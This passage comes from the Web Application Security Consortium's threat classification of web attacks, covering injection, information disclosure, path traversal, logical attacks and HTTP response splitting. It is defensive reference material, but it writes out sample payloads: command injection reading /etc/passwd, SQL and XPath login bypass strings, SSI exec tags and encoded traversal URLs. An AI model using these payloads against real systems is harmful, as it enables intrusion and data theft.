(uid=*). The resulting LDAP statement will make the server return
any object that contains a uid attribute.



References
"LDAP Injection: Are Your Web Applications Vulnerable?", By Sacha Faust - SPI Dynamics
http://www.spidynamics.com/whitepapers/LDAPinjection.pdf

"A String Representation of LDAP Search Filters"
http://www.ietf.org/rfc/rfc1960.txt

"Understanding LDAP"
http://www.redbooks.ibm.com/redbooks/SG244986.html

"LDAP Resources"
http://ldapman.org/



4.4 OS Commanding
OS Commanding is an attack technique used to exploit web sites by
executing Operating System commands through manipulation of
application input.

When a web application does not properly sanitize user-supplied
input before using it within application code, it may be possible to trick
the application into executing Operating System commands. The
executed commands will run with the same permissions of the
component that executed the command (e.g. Database server, Web
application server, Web server, etc.).


Example
Perl allows piping data from a process into an open statement, by
appending a '|' (Pipe) character onto the end of a filename.

Pipe character examples:

# Execute "/bin/ls" and pipe the output to the open
statement
open(FILE, "/bin/ls|")


Web applications often include parameters that specify a file that is
displayed or used as a template. If the web application does not
properly sanitize the input provided by a user, an attacker may
change the parameter value to include a shell command followed by
the pipe symbol (shown above).

If the original URL of the web application is:
http://example/cgi-bin/showInfo.pl?name=John&template=tmp1.txt 

Changing the template parameter value, the attacker can trick the
web application into executing the command /bin/ls:
http://example /cgi-
bin/showInfo.pl?name=John&template=/bin/ls|
Most scripting languages enable programmers to execute Operating
System commands during run-time, by using various exec functions.
If the web application allows user-supplied input to be used inside
such a function call without being sanitized first, it may be possible for
an attacker to run Operating System commands remotely. For
example, here is a part of a PHP script, which presents the contents
of a system directory (on Unix systems):

Execute a shell command:

exec("ls -la $dir",$lines,$rc);


By appending a semicolon (;) followed by an Operating System
command, it is possible to force the web application into executing
the second command:
http://example/directory.php?dir=%3Bcat%20/etc/pass
wd

The result will retrieve the contents of the /etc/passwd file.



References
"Perl CGI Problems", By RFP - Phrack Magazine, Issue 55
http://www.wiretrip.net/rfp/txt/phrack55.txt
(See "That pesky pipe" section)

"Marcus Xenakis directory.php Shell Command Execution
Vulnerability"
http://www.securityfocus.com/bid/4278

"NCSA Secure Programming Guidelines"
http://archive.ncsa.uiuc.edu/General/Grid/ACES/security/programming/#cgi




4.5 SQL Injection
SQL Injection is an attack technique used to exploit web sites that
construct SQL statements from user-supplied input.

Structured Query Language (SQL) is a specialized programming
language for sending queries to databases. Most small and industrial-
strength database applications can be accessed using SQL
statements. SQL is both an ANSI and an ISO standard. However,
many database products supporting SQL do so with proprietary
extensions to the standard language. Web applications may use
user-supplied input to create custom SQL statements for dynamic
web page requests.

When a web application fails to properly sanitize user-supplied input,
it is possible for an attacker to alter the construction of backend SQL
statements. When an attacker is able to modify a SQL statement, the
process will run with the same permissions as the component that
executed the command. (e.g. Database server, Web application
server, Web server, etc.). The impact of this attack can allow
attackers to gain total control of the database or even execute
commands on the system.

The same advanced exploitation techniques available in LDAP
Injection can also be similarly applied to SQL Injection.


Example
A web based authentication form might have code that looks like the
following:



SQLQuery = "SELECT Username FROM Users WHERE
Username = '" & strUsername & "' AND Password = '"
& strPassword & "'" strAuthCheck =
GetQueryResult(SQLQuery)


In this code, the developer is taking the user-input from the form and
embedding it directly into an SQL query.

Suppose an attacker submits a login and password that looks like the
following:

    Login: ' OR ''='
    Password: ' OR ''='

This will cause the resulting SQL query to become:


SELECT Username FROM Users WHERE Username = '' OR
''='' AND Password = '' OR ''=''


Instead of comparing the user-supplied data with entries in the Users
table, the query compares '' (empty string) to '' (empty string). This
will return a True result and the attacker will then be logged in as the
first user in the Users table.

There are two commonly known methods of SQL injection: Normal
SQL Injection and Blind SQL Injection. The first is vanilla SQL
Injection in which the attacker can format his query to match the
developer's by using the information contained in the error messages
that are returned in the response.

Normal SQL Injection
By appending a union select statement to the parameter, the
attacker can test to see if he can gain access to the database:

http://example/article.asp?ID=2+union+all+select+na
me+from+sysobjects

The SQL server then might return an error similar to this:

Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All
queries in an SQL statement containing a UNION
operator must have an equal number of expressions
in their target lists.


This tells the attacker that he must now guess the correct number of
columns for his SQL statement to work.


Blind SQL Injection
In Blind SQL Injection, instead of returning a database error, the
server returns a customer-friendly error page informing the user that
a mistake has been made. In this instance, SQL Injection is still
possible, but not as easy to detect. A common way to detect Blind
SQL Injection is to put a false and true statement into the parameter
value.

Executing the following request to a web site:

http://example/article.asp?ID=2+and+1=1

should return the same web page as:

http://example/article.asp?ID=2

because the SQL statement 'and 1=1' is always true.

Executing the following request to a web site:

http://example/article.asp?ID=2+and+1=0

would then cause the web site to return a friendly error or no page at
all. This is because the SQL statement "and 1=0" is always false.

Once the attacker discovers that a site is susceptible to Blind SQL
Injection, he can exploit this vulnerability more easily, in some cases,
than by using normal SQL Injection.



References
"SQL Injection: Are your Web Applications Vulnerable" - SPI Dynamics
http://www.spidynamics.com/support/whitepapers/WhitepaperSQLInjection.pdf

"Blind SQL Injection: Are your Web Applications Vulnerable" - SPI Dynamics
http://www.spidynamics.com/support/whitepapers/Blind_SQLInjection.pdf

"Advanced SQL Injection in SQL Server Applications", Chris Anley - NGSSoftware
http://www.nextgenss.com/papers/advanced_sql_injection.pdf

"More advanced SQL Injection", Chris Anley - NGSSoftware
http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf

"Web Application Disassembly with ODBC Error Messages", David Litchfield - @stake
http://www.nextgenss.com/papers/webappdis.doc

"SQL Injection Walkthrough"
http://www.securiteam.com/securityreviews/5DP0N1P76E.html

"Blind SQL Injection" - Imperva
http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html

"SQL Injection Signatures Evasion" - Imperva
http://www.imperva.com/application_defense_center/white_papers/sq
l_injection_signatures_evasion.html

"Introduction to SQL Injection Attacks for Oracle Developers" - Integrigy
http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf




4.6 SSI Injection
SSI Injection (Server-side Include) is a server-side exploit technique
that allows an attacker to send code into a web application, which will
later be executed locally by the web server. SSI Injection exploits a
web application's failure to sanitize user-supplied data before they
are inserted into a server-side interpreted HTML file.

Before serving an HTML web page, a web server may parse and
execute Server-side Include statements before providing it to the
user. In some cases (e.g. message boards, guest books, or content
management systems), a web application will insert user-supplied
data into the source of a web page.

If an attacker submits a Server-side Include statement, he may have
the ability to execute arbitrary operating system commands, or
include a restricted file's contents the next time the page is served.

Example

The following SSI tag can allow an attacker to get the root directory
listing on a UNIX based system.

<!--#exec cmd="/bin/ls /" -->



The following SSI tag can allow an attacker to obtain database
connection strings, or other sensitive data contained within a .NET
configuration file.

<!--#INCLUDE VIRTUAL="/web.config"-->





References
"Server Side Includes (SSI)" - NCSA HTTPd
http://hoohoo.ncsa.uiuc.edu/docs/tutorials/includes.html

"Security Tips for Server Configuration" - Apache HTTPD
http://httpd.apache.org/docs/misc/security_tips.html#ssi

"Header Based Exploitation: Web Statistical Software Threats" -
CGISecurity.com
http://www.cgisecurity.net/papers/header-based-exploitation.txt

"A practical vulnerability analysis"
http://hexagon.itgo.com/Notadetapa/a_practical_vulnerability_analys.
htm




4.7 XPath Injection
XPath Injection is an attack technique used to exploit web sites that
construct XPath queries from user-supplied input.

XPath 1.0 is a language used to refer to parts of an XML document. It
can be used directly by an application to query an XML document, or
as part of a larger operation such as applying an XSLT transformation
to an XML document, or applying an XQuery to an XML document.

The syntax of XPath bears some resemblance to an SQL query, and
indeed, it is possible to form SQL-like queries on an XML document
using XPath. For example, assume an XML document that contains
elements by the name user, each of which contains three
subelements - name, password and account. The following XPath
expression yields the account number of the user whose name is
"jsmith" and whose password is "Demo1234" (or an empty string if no
such user exists):


string(//user[name/text()='jsmith' and
password/text()='Demo1234']/account/text())


If an application uses run-time XPath query construction, embedding
unsafe user input into the query, it may be possible for the attacker to
inject data into the query such that the newly formed query will be
parsed in a way differing from the programmer's intention.

Example
Consider a web application that uses XPath to query an XML
document and retrieve the account number of a user whose name
and password are received from the client. Such application may
embed these values directly in the XPath query, thereby creating a
security hole.

Here's an example (assuming Microsoft ASP.NET and C#):

XmlDocument XmlDoc = new XmlDocument();
XmlDoc.Load("...");

XPathNavigator nav = XmlDoc.CreateNavigator();
XPathExpression expr =
nav.Compile("string(//user[name/text()='"+TextBox1.Text+"'
and password/text()='"+TextBox2.Text+
"']/account/text())");

String account=Convert.ToString(nav.Evaluate(expr));
if (account=="") {
// name+password pair is not found in the XML document
-
// login failed.

} else {
// account found -> Login succeeded.
// Proceed into the application.
}


When such code is used, an attacker can inject XPath expressions,
e.g. provide the following value as a user name:

' or 1=1 or ''='

This causes the semantics of the original XPath to change, so that it
always returns the first account number in the XML document. The
query, in this case, will be:



string(//user[name/text()='' or 1=1 or ''='' and
password/text()='foobar']/account/text())


Which is identical (since the predicate is evaluates to true on all
nodes) to

string(//user/account/text())

Yielding the first instance of //user/account/text().

The attack, therefore, results in having the attacker logged in (as the
first user listed in the XML document), although the attacker did not
provide any valid user name or password.

References
"XML Path Language (XPath) Version 1.0" - W3C Recommendation, 16 Nov 1999
http://www.w3.org/TR/xpath

"Encoding a Taxonomy of Web Attacks with Different-Length Vectors" - G. Alvarez and S. Petrovic
http://arxiv.org/PS_cache/cs/pdf/0210/0210026.pdf

"Blind XPath Injection" - Amit Klein
http://www.sanctuminc.com/pdfc/WhitePaper_Blind_XPath_Injection_20040518.pdf




5 Information Disclosure
The Information Disclosure section covers attacks designed to
acquire system specific information about a web site. System specific
information includes the software distribution, version numbers, and
patch levels. Or the information may contain the location of backup
files and temporary files. In most cases, divulging this information is
not required to fulfill the needs of the user. Most web sites will reveal
a certain amount of data, but it's best to limit the amount of data
whenever possible. The more information about the web site an
attacker learns, the easier the system becomes to compromise.



5.1 Directory Indexing
Automatic directory listing/indexing is a web server function that lists
all of the files within a requested directory if the normal base file
(index.html/home.html/default.htm) is not present.  When a
user requests the main page of a web site, they normally type in a
URL such as: http://www.example - using the domain name and
excluding a specific file.  The web server processes this request and
searches the document root directory for the default file name and
sends this page to the client.  If this page is not present, the web
server will issue a directory listing and send the output to the client. 
Essentially, this is equivalent to issuing an "ls" (Unix) or "dir"
(Windows) command within this directory and showing the results in
HTML form.  From an attack and countermeasure perspective, it is
important to realize that unintended directory listings may be possible
due to software vulnerabilities (discussed in the example section
below) combined with a specific web request.

When a web server reveals a directory's contents, the listing could
contain information not intended for public viewing.  Often web
administrators rely on "Security Through Obscurity" assuming that if
there are no hyperlinks to these documents, they will not be found, or
no one will look for them. The assumption is incorrect. Today's
vulnerability scanners, such as Nikto, can dynamically add additional
directories/files to include in their scan based upon data obtained in
initial probes.  By reviewing the /robots.txt file and/or viewing
directory indexing contents, the vulnerability scanner can now
interrogate the web server further with these new data.  Although
potentially harmless, Directory Indexing could allow an information
leak that supplies an attacker with the information necessary to
launch further attacks against the system.


Example
The following information could be obtained based on directory
indexing data:

- Backup files - with extensions such as .bak, .old or .orig
- Temporary files - these are files that are normally purged from
the server but for some reason are still available
- Hidden files - with filenames that start with a "." period.
- Naming conventions - an attacker may be able to identify the
composition scheme used by the web site to name directories or
files.  Example: Admin vs. admin, backup vs. back-up, etc...
- Enumerate User Accounts - personal user accounts on a web
server often have home directories named after their user
account.
- Configuration file contents - these files may contain access
control data and have extentions such as .conf, .cfg or
.config
- Script Contents - Most web servers allow for executing scripts
by either specifying a script location (e.g. /cgi-bin) or by
configuring the server to try and execute files based on file
permissions (e.g. the execute bit on *nix systems and the use of
the Apache XBitHack directive).  Due to these options, if
directory indexing of cgi-bin contents are allowed, it is
possible to download/review the script code if the permissions
are incorrect.

There are three different scenarios where an attacker may be able to
retrieve an unintended directory listing/index:

1) The web server is mistakenly configured to allow/provide a
directory index.  Confusion may arise of the net effect when a
web administrator is configuring the indexing directives in the
configuration file.  It is possible to have an undesired result
when implementing complex settings, such as wanting to allow
directory indexing for a specific sub-directory, while disallowing
it on the rest of the server. From the attacker's perspective, the
HTTP request is identical to the previous one above.  They
request a directory and see if they receive the desired content. 
They are not concerned with or care "why" the web server was
configured in this manner.

2) Some components of the web server allow a directory index
even if it is disabled within the configuration file or if an index
page is present.  This is the only valid "exploit" example
scenario for directory indexing.  There have been numerous
vulnerabilities identified on many web servers, which will result
in directory indexing if specific HTTP requests are sent.

3) Google' cache database may contain historical data that would
include directory indexes from past scans of a specific web site. 


References
Directory Indexing Vulnerability Alerts
http://www.securityfocus.com/bid/1063
http://www.securityfocus.com/bid/6721
http://www.securityfocus.com/bid/8898

Nessus "Remote File Access" Plugin Web page
http://cgi.nessus.org/plugins/dump.php3?family=Remote%20file%20access

Web Site Indexer Tools
http://www.download-freeware-shareware.com/Internet.php?Theme=112

Intrustion Prevention for Web
http://www.modsecurity.org

Search Engines as a Security Threat
http://it.korea.ac.kr/class/2002/software/Reading%20List/Search%20Engines%20as%20a%20Security%20Threat.pdf

The Google Hacker's Guide
http://johnny.ihackstuff.com/security/premium/The_Google_Hackers_Guide_v1.0.pdf



5.2 Information Leakage
Information Leakage is when a web site reveals sensitive data, such
as developer comments or error messages, which may aid an
attacker in exploiting the system. Sensitive information may be
present within HTML comments, error messages, source code, or
simply left in plain sight. There are many ways a web site can be
coaxed into revealing this type of information. While leakage does not
necessarily represent a breach in security, it does give an attacker
useful guidance for future exploitation. Leakage of sensitive
information may carry various levels of risk and should be limited
whenever possible.

In the first case of information leakage (comments left in the code,
verbose error messages, etc.), the leak may give intelligence to the
attacker with contextual information of directory structure, SQL query
structure, and the names of key processes used by the web site.
Often a developer will leave comments in the
HTML and script code to help facilitate in debugging or integration.
This information can range from simple comments detailing how the
script works, to, in the worst cases, usernames and passwords used
during the testing phase of development.

Information Leakage also applies to data deemed confidential, which
aren't properly protected by the web site. These data may include
account numbers, user identifiers (Drivers license number, Passport
number, Social Security Numbers, etc.) and user specific data
(account balances, address, and transaction history).
Insufficient Authentication, Insufficient Authorization, and secure
transport encryption also deal with protecting and enforcing proper
controls over access to data. Many attacks fall outside the scope of
web site protection such as client attacks, the "casual observer"
concerns. Information Leakage in this context deals with exposure of
key user data deemed confidential or secret that should not be
exposed in plain view even to the user. Credit card numbers are a
prime example of user data that needs to be further protected from
exposure or leakage even with the proper encryption and access
controls in place.


Example
There are three main categories of Information Leakage: Comments
left in code, verbose error messages and confidential data in plain
sight.

Comments left in code:

<TABLE border="0" cellPadding="0" cellSpacing="0"
height="59" width="591">
        <TBODY>
           <TR>
                <!--If the image files are missing,
restart VADER -->
                <TD bgColor="#ffffff" colSpan="5"
height="17" width="587">&nbsp;</TD>
            </TR>


Here we see a comment left by the development/QA personnel
indicating what one should do if the image files do not show up. The
security breach is the Host name of the server that is mentioned
explicitly in the code, "VADER"..

An example of a verbose error message can be the response to an
invalid query. A prominent example is the error message associated
with SQL queries. SQL Injection attacks typically require the attacker
to have prior knowledge of the structure or format used to create SQL
queries on the site. The information leaked by a verbose error
message can provide the attacker the crucial information on how to
construct valid SQL queries for the backend database.

The following was returned when placing an apostrophe into the
username filed of a login page:

Verbose error message:

An Error Has Occurred.
Error Message:
System.Data.OleDb.OleDbException: Syntax error (missing
operator) in query expression 'username = ''' and password =
'g''. at 
System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling (
Int32 hr) at
System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult
( tagDBPARAMS dbParams,  Object& executeResult) at


In the first error statement a syntax error is reported. The error
message reveals the query parameters that are used in the SQL
query: username and password. This leaked information is the
missing link for an attacker to begin to construct SQL Injection attacks
against the site.



References
"Best practices with custom error pages in .Net", Microsoft Support
http://support.microsoft.com/default.aspx?scid=kb;en-us;834452

"Creating Custom ASP Error Pages", Microsoft Support
http://support.microsoft.com/default.aspx?scid=kb;en-us;224070

"Apache Custom Error Pages", Code Style
http://www.codestyle.org/sitemanager/apache/errors-Custom.shtml

"Customizing the Look of Error Messages in JSP", DrewFalkman.com
http://www.drewfalkman.com/resources/CustomErrorPages.cfm

ColdFusion Custom Error Pages
http://livedocs.macromedia.com/coldfusion/6/Developing_ColdFusion_MX_Applications_with_CFML/Errors6.htm

Obfuscators :
JAVA
http://www.cs.auckland.ac.nz/~cthombor/Students/hlai/hongying.pdf




5.3 Path Traversal
The Path Traversal attack technique forces access to files,
directories, and commands that potentially reside outside the web
document root directory. An attacker may manipulate a URL in such a
way that the web site will execute or reveal the contents of arbitrary
files anywhere on the web server. Any device that exposes an HTTP-
based interface is potentially vulnerable to Path Traversal.

Most web sites restrict user access to a specific portion of the file-
system, typically called the "web document root" or "CGI root"
directory. These directories contain the files intended for user access
and the executables necessary to drive web application functionality.
To access files or execute commands anywhere on the file-system,
Path Traversal attacks will utilize the ability of special-characters
sequences.

The most basic Path Traversal attack uses the "../" special-
character sequence to alter the resource location requested in the
URL. Although most popular web servers will prevent this technique
from escaping the web document root, alternate encodings of the
"../" sequence may help bypass the security filters. These method
variations include valid and invalid Unicode-encoding ("..%u2216" or
"..%c0%af") of the forward slash character, backslash characters
("..\") on Windows-based servers, URL encoded characters
("%2e%2e%2f"), and double URL encoding ("..%255c") of the
backslash character.

Even if the web server properly restricts Path Traversal attempts in
the URL path, a web application itself may still be vulnerable due to
improper handling of user-supplied input. This is a common problem
of web applications that use template mechanisms or load static text
from files. In variations of the attack, the original URL parameter
value is substituted with the file name of one of the web application's
dynamic scripts. Consequently, the results can reveal source code
because the file is interpreted as text instead of an executable script.
These techniques often employ additional special characters such as
the dot (".") to reveal the listing of the current working directory, or
"%00" NUL characters in order to bypass rudimentary file extension
checks.


Example

Path Traversal attacks against a web server
Attack: http://example/../../../../../some/file
Attack: http://example/..%255c..%255c..%255csome/file
Attack: http://example/..%u2216..%u2216some/file

Path Traversal attacks against a web application
Original: http://example/foo.cgi?home=index.htm
Attack: http://example/foo.cgi?home=foo.cgi

In the above example, the web application reveals the source code of
the foo.cgi file because the value of the home variable was used
as content. Notice that in this case the attacker does not need to
submit any invalid characters or any path traversal characters for the
attack to succeed. The attacker has targeted another file in the same
directory as index.htm.


Path Traversal attacks against a web application using special-
character sequences:
Original: http://example/scripts/foo.cgi?page=menu.txt
Attack:
http://example/scripts/foo.cgi?page=../scripts/foo.cgi%00txt

In above example, the web application reveals the source code of the
foo.cgi file by using special-characters sequences. The "../"
sequence was used to traverse one directory above the current and
enter the /scripts directory. The "%00" sequence was used both to
bypass file extension check and snip off the extension when the file
was read in.

Reference
"CERT?Advisory CA-2001-12 Superfluous Decoding Vulnerability in IIS"
http://www.cert.org/advisories/CA-2001-12.html

"Novell Groupwise Arbitrary File Retrieval Vulnerability"
http://www.securityfocus.com/bid/3436/info/




5.4 Predictable Resource Location
Predictable Resource Location is an attack technique used to
uncover hidden web site content and functionality. By making
educated guesses, the attack is a brute force search looking for
content that is not intended for public viewing. Temporary files,
backup files, configuration files, and sample files are all examples of
potentially leftover files.  These brute force searches are easy
because hidden files will often have common naming convention and
reside in standard locations. These files may disclose sensitive
information about web application internals, database information,
passwords, machine names, file paths to other sensitive areas, or
possibly contain vulnerabilities. Disclosure of this information is
valuable to an attacker.

Predictable Resource Location is also known as Forced Browsing,
File Enumeration, Directory Enumeration, etc.


Example
Any attacker can make arbitrary file or directory requests to any
publicly available web server. The existence of a resource can be
determined by analyzing the web server HTTP response codes.
There are several of Predictable Resource Location attack variations:

Blind searches for common files and directories
/admin/
/backup/
/logs/
/vulnerable_file.cgi

Adding extensions to existing filename: (/test.asp)
/test.asp.bak
/test.bak
/test




6 Logical Attacks
The Logical Attacks section focuses on the abuse or exploitation of a
web application's logic flow. Application logic is the expected
procedural flow used in order to perform a certain action. Password
recovery, account registration, auction bidding, and eCommerce
purchases are all examples of application logic. A web site may
require a user to correctly perform a specific multi-step process to
complete a particular action. An attacker may be able to circumvent
or misuse these features to harm a web site and its users.



6.1 Abuse of Functionality
Abuse of Functionality is an attack technique that uses a web site's
own features and functionality to consume, defraud, or circumvents
access controls mechanisms. Some functionality of a web site,
possibly even security features, may be abused to cause unexpected
behavior.  When a piece of functionality is open to abuse, an attacker
could potentially annoy other users or perhaps defraud the system
entirely. The potential and level of abuse will vary from web site to
web site and application to application.

Abuse of Functionality techniques are often intertwined with other
categories of web application attacks, such as performing an
encoding attack to introduce a query string that turns a web search
function into a remote web proxy. Abuse of Functionality attacks are
also commonly used as a force multiplier. For example, an attacker
can inject a Cross-site Scripting snippet into a web-chat session and
then use the built-in broadcast function to propagate the malicious
code throughout the site.

In a broad view, all effective attacks against computer-based systems
entail Abuse of Functionality issues.  Specifically, this definition
describes an attack that has subverted a useful web application for a
malicious purpose with little or no modification to the original function.


Example
Examples of Abuse of Functionality include: a) Using a web site's
search function to access restricted files outside of a web directory, b)
Subverting a file upload subsystem to replace critical internal
configuration files, and c) Performing a DoS by flooding a web-login
system with good usernames and bad passwords to lock out
legitimate users when the allowed login retry-limit is exceeded. Other
real-world examples are described below.


Matt Wright FormMail
The PERL-based web application "FormMail" was normally used to
transmit user-supplied form data to a preprogrammed e-mail address. 
The script offered an easy to use solution for web site's to gather
feedback.  For this reason, the FormMail script was one of the most
popular CGI programs on-line.  Unfortunately, this same high degree
of utility and ease of use was abused by remote attackers to send e-
mail to any remote recipient.  In short, this web application was
transformed into a spam-relay engine with a single browser web
request.

An attacker merely has to craft an URL that supplied the desired e-
mail parameters and perform an HTTP GET to the CGI, such as:
http://example/cgi-bin/FormMail.pl? recipient=email@victim.example&message=you%20got%20spam

An email would be dutifully generated, with the web server acting as
the sender, allowing the attacker to be fully proxied by the web-
application. Since no security mechanisms existed for this version of
the script, the only viable defensive measure was to rewrite the script
with a hard-coded e-mail address.  Barring that, site operates were
forced to remove or replace the web application entirely.

Macromedia's Cold Fusion
Sometimes basic administrative tools are embedded within web
applications that can be easily used for unintended purposes.  For
example, Macromedia's Cold Fusion by default has a built-in module
for viewing source code that is universally accessible.  Abuse of this
module can result in critical web application information leakage. 
Often these types of modules are not sample files or extraneous
functions, but critical system components.  This makes disabling
these functions problematic since they are tied to existing web
application systems.


Smartwin CyberOffice Shopping Cart Price Modification
Abuse of functionality is performed when an attacker alters data in an
unanticipated way in order to modify the behavior of the web
application.  For example, the CyberOffice shopping cart can be
abused by changing the hidden price field within the web form.  The
web page is downloaded normally, edited and then resubmitted with
the prices set to any desired value.


References
"FormMail Real Name/Email Address CGI Variable Spamming Vulnerability"
http://www.securityfocus.com/bid/3955

"CVE-1999-0800"
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0800

"CA Unicenter pdmcgi.exe View Arbitrary File"
http://www.osvdb.org/displayvuln.php?osvdb_id=3247

"PeopleSoft PeopleBooks Search CGI Flaw"
http://www.osvdb.org/displayvuln.php?osvdb_id=2815

"iisCART2000 Upload Vulnerability"
http://secunia.com/advisories/8927/

"PROTEGO Security Advisory #PSA200401"
http://www.protego.dk/advisories/200401.html

"Price modification possible in CyberOffice Shopping Cart"
http://archives.neohapsis.com/archives/bugtraq/2000-10/0011.html




6.2 Denial of Service
Denial of Service (DoS) is an attack technique with the intent of
preventing a web site from serving normal user activity. DoS attacks,
which are easily normally applied to the network layer, are also
possible at the application layer. These malicious attacks can
succeed by starving a system of critical resources, vulnerability
exploit, or abuse of functionality.

Many times DoS attacks will attempt to consume all of a web site's
available system resources such as: CPU, memory, disk space etc.
When any one of these critical resources reach full utilization, the
web site will normally be inaccessible.

As today's web application environments include a web server,
database server and an authentication server, DoS at the application
layer may target each of these independent components. Unlike DoS
at the network layer, where a large number of connection attempts
are required, DoS at the application layer is a much simpler task to
perform.


Example
Assume a Health-Care web site that generates a report with medical
history. For each report request, the web site queries the database to
fetch all records matching a single social security number. Given that
hundred of thousands of records are stored in the database (for all
users), the user will need to wait three minutes to get their medical
history report. During the three minutes of time, the database server's
CPU reaches 60% utilization while searching for matching records.

A common application layer DoS attack will send 10 simultaneous
requests asking to generate a medical history report. These requests
will most likely put the web site under a DoS-condition as the
database server's CPU will reach 100% utilization. At this point the
system will likely be inaccessible to normal user activity.

DoS targeting a specific user
An intruder will repeatedly attempt to login to a web site as some
user, purposely doing so withan invalid password. This process will
eventually lock out the user.

DoS targeting the Database server
An intruder will use SQL injection techniques to modify the database
so that the system becomes unusable (e.g., deleting all data, deleting
all usernames etc.)

DoS targeting the Web server
An intruder will use Buffer Overflow techniques to send a specially
crafted request that will crashes the web server process and the
system will normally be inaccessible to normal user activity.



6.3 Insufficient Anti-automation
Insufficient Anti-automation is when a web site permits an attacker to
automate a process that should only be performed manually. Certain
web site functionalities should be protected against automated
attacks.

Left unchecked, automated robots (programs) or attackers could
repeatedly exercise web site functionality attempting to exploit or
defraud the system. An automated robot could potentially execute
thousands of requests a minute, causing potential loss of
performance or service.

For example, an automated robot should not be able to sign up ten
thousand new accounts in a few minutes. Similarly, automated robots
should not be able to annoy other users with repeated message
board postings. These operations should be limited only to human
usage.

References
Telling Humans Apart (Automatically)
http://www.captcha.net/

"Ravaged by Robots!", By Randal L. Schwartz
http://www.webtechniques.com/archives/2001/12/perl/

".Net Components Make Visual Verification Easier", By JingDong (Jordan) Zhang
http://go.cadwire.net/?3870,3,1

"Vorras Antibot"
http://www.vorras.com/products/antibot/

"Inaccessibility of Visually-Oriented Anti-Robot Tests"
http://www.w3.org/TR/2003/WD-turingtest-20031105/




6.4 Insufficient Process Validation
Insufficient Process Validation is when a web site permits an attacker
to bypass or circumvent the intended flow control of an application. If
the user state through a process is not verified and enforced, the web
site could be vulnerable to exploitation or fraud.

When a user performs a certain web site function, the application
may expect the user to navigate through a specific order sequence. 
If the user performs certain steps incorrectly or out of order, a data
integrity error occurs. Examples of multi-step processes include wire
transfer, password recovery, purchase checkout, account signup, etc.
These processes will likely require certain steps to be performed as
expected.

For multi-step processes to function properly, web sites are required
to maintain user state as the user traverses the process flow. Web
sites will normally track a users state through the use of cookies or
hidden HTML form fields. However, when tracking is stored on the
client side within the web browser, the integrity of the data must be
verified. If not, an attacker may be able to circumvent the expected
traffic flow by altering the current state.


Example
An online shopping cart system may offer to the user a discount if
product A is purchased. The user may not want to purchase product
A, but product B. By filling the shopping cart with product A and
product B, and entering the checkout process, the user obtains the
discount. The user then backs out of the checkout process, and
removes product A, or simply alters the values before submitting to
the next step. The user then reenters the checkout process, keeping
the discount already given in the previous checkout process with
product A in the shopping cart, and obtains a fraudulent purchase
price.



References
"Dos and Don'ts of Client Authentication on the Web", Kevin Fu, Emil
Sit, Kendra Smith, Nick Feamster - MIT Laboratory for Computer Science
http://cookies.lcs.mit.edu/pubs/webauth:tr.pdf




Contact

Web Application Security Consortium
http://www.webappsec.org

For general inquiries, email contact@webappsec.org





Appendix

There are several web application security attack techniques that we are
unable to classify at this time. Within the appendix, there is summarized
documentation that describes some of these methodologies. These issues will
be handled systematically in version 2 of the Threat Classification.


1.1 HTTP Response Splitting

In the HTTP Response Splitting attack, there are always 3 parties (at
least) involved:
_ Web server, which has a security hole enabling HTTP Response Splitting
_ Target - an entity that interacts with the web server perhaps on behalf of
the attacker. Typically this is a cache server (forward/reverse proxy), or a
browser (possibly with a browser cache).
_ Attacker - initiates the attack

The essence of HTTP Response Splitting is the attacker's ability to send a single
HTTP request that forces the web server to form an output stream, which is then
interpreted by the target as two HTTP responses instead of one response, in the
normal case. The first response may be partially controlled by the attacker, but
this is less important. What is material is that the attacker completely controls the
form of the second response from the HTTP status line to the last byte of the
HTTP response body. Once this is possible, the attacker realizes the attack by
sending two requests through the target. The first one invokes two responses
from the web server, and the second request would typically be to some
"innocent" resource on the web server. However, the second request would be
matched, by the target, to the second HTTP response, which is fully controlled by
the attacker. The attacker, therefore, tricks the target into believing that a
particular resource on the web server (designated by the second request) is the
server's HTTP response (server content), while it is in fact some data, which is
forged by the attacker through the web server - this is the second response.

HTTP Response Splitting attacks take place where the server script
embeds user data in HTTP response headers. This typically happens
when the script embeds user data in the redirection URL of a
redirection response (HTTP status code 3xx), or when the script
embeds user data in a cookie value or name when the response sets
a cookie.

In the first case, the redirection URL is part of the Location HTTP response
header, and in the second cookie setting case, the cookie name/value is part of
the Set-Cookie HTTP response header.

The essence of the attack is injecting CRs and LFs in such manner that a second
HTTP message is formed where a single one was planned for by the application.
CRLF injection is a method used for several other attacks which change the data
of the single HTTP response send by the application (e.g. [2]), but in this case,
the role of the CRLFs is slightly different - it is meant to terminate the first
(planned) HTTP response message, and form another (totally crafted by the
attacked, and totally unplanned by the application) HTTP response message
(hence the name of the attack).
This injection is possible if the application (that runs on top of the web server)
embeds un-validated user data in a redirection, cookie setting, or any other
manner that eventually causes user data to become part of the HTTP response
headers.

With HTTP Response Splitting, it is possible to mount various kinds of attacks:
_ Cross-site Scripting (XSS): Until now, it has been impossible to mount
XSS attacks on sites through a redirection script when the clients use IE
unless all the location headers can be controlled. This attack makes it
possible.
_ Web Cache Poisoning (defacement): This is a new attack. The attacker
simply forces the target (i.e. a cache server of some sort - the attack was
verified on Squid 2.4, NetCache 5.2, Apache Proxy 2.0 and few other
cache servers) to cache the second response in response to the second
request. An example is to send a second request to
"http://web.site/index.html", and force the target (cache server) to cache the
second response that is fully controlled by the attacker. This is effectively a
defacement of the web site, at least as experienced by other clients, who
use the same cache server. Of course, in addition to defacement, an
attacker can steal session cookies, or "fix" them to a predetermined value.
_ Cross User attacks (single user, single page, temporary defacement: As a
variant of the attack, it is possible for the attacker not to send the second
request. This seems odd at first, but the idea is that in some cases, the
target may share the same TCP connection with the server, among several
users (this is the case with some cache servers). The next user to send a
request to the web server through the target will be served by the target
with the second response the attacker generated. The net result is having
a client of the web site being served with a resource that was crafted by the
attacker. This enables the attacker to "deface" the site for a single page
requested by a single user (a local, temporary defacement). Much like the
previous item, in addition to defacement, the attacker can steal session
cookies and/or set them.
_ Hijacking pages with user-specific information: With this attack, it is
possible for the attacker to receive the server response to a user request
instead of the user. Therefore, the attacker gains access to user specific
information that may be sensitive and confidential.
